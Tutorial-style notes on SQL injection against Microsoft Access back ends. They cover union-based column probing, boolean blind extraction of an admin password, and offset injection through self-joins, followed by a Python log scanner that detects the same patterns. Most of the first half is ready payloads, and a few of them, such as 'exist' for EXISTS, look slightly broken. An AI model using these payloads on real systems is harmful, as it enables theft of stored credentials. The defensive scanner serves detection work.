I. Access injection
Access has only one database.
A. Union-based injection
1. order by 20 to determine the number of columns, then guess the table name
2. union select 1,2,3,4,5,6 from admin to find which column positions are echoed in the page
3. union select password,2,3,4,5,6 from admin to guess column names
B. Character-by-character (boolean blind) injection
1. and exist(select * from admin) to guess the table
If the admin table exists, the page returns normally
2. and exist(select password from admin) to guess the column
If the password column exists, the page returns normally
3. and (select top 1 len(password) from admin)=5 to determine the length
and (select top 1 len(password) from admin)>5
The page returns normally when the length equals 5 or is greater than 5, respectively
4. and (select top 1 asc(mid(password,2,1)) from admin)=97
Determines the character at each position; 97 is the ASCII code being tested
The page returns normally when the guess is correct
II. When column names cannot be obtained in Access
Use offset injection, social engineering, or read the parameter names from the page source
1. union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
2. union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin
3. union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,* from admin
Keep removing numbers until the page returns normally; the number removed is the table's column count, and each further self-join removes a multiple of it (assumed to be 4 here)
4. union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,a.id,b.id,c.id,* from (admin as a inner join admin as b on a.id=b.id)
5. union select 1,2,3,4,5,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
6. union select 1,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on a.id=d.id)
The data is revealed
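As an added defensive illustration that is not part of the original notes, the Python below scans web-server log lines for the Access injection signatures listed above (order by / union select probing, exist() table and column guessing, len() and asc(mid()) boolean blind extraction, and the self-join offset pattern). The log lines, the client IP and the /news.asp path are constructed sample data, not from any real server.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the Access injection steps in the notes above:
# union/order-by probing, exist() table/column guessing,
# len()/asc(mid()) boolean blind extraction, self-join offset injection.
SIGNATURES = {
    "union_probe": re.compile(r"\bunion\s+select\b", re.I),
    "orderby_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "exist_guess": re.compile(r"\bexist\s*\(\s*select\b", re.I),
    "blind_len": re.compile(r"\blen\s*\(\s*\w+\s*\)", re.I),
    "blind_char": re.compile(r"\basc\s*\(\s*mid\s*\(", re.I),
    "offset_join": re.compile(r"\binner\s+join\s+\w+\s+as\s+\w+", re.I),
}

# Common log format; only client IP, request path and status are extracted.
LOG_RX = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample log lines (hypothetical IP and path).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /news.asp?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /news.asp?id=1+order+by+20 HTTP/1.1" 500 0
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /news.asp?id=1+and+exist(select+*+from+admin) HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /news.asp?id=1+and+(select+top+1+asc(mid(password,2,1))+from+admin)=97 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /news.asp?id=1+union+select+1,*+from+(admin+as+a+inner+join+admin+as+b+on+a.id=b.id) HTTP/1.1" 200 812
"""

def classify(query_string):
    """Return the sorted signature names matching a URL-decoded query string."""
    decoded = unquote_plus(query_string)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def scan_log(text):
    """Return (ip, path, status, signatures) for every request matching a signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RX.match(line)
        if not m:
            continue
        _, _, qs = m.group("path").partition("?")
        sigs = classify(qs)
        if sigs:
            hits.append((m.group("ip"), m.group("path"), int(m.group("status")), sigs))
    return hits

def blind_probe_count(hits, ip):
    """Count boolean-blind probes from one IP; a burst of these is the extraction loop."""
    blind = {"blind_len", "blind_char", "exist_guess"}
    return sum(1 for h in hits if h[0] == ip and blind & set(h[3]))
```

A real deployment would also alert on the 500 responses that the order by probing produces right before the successful union requests.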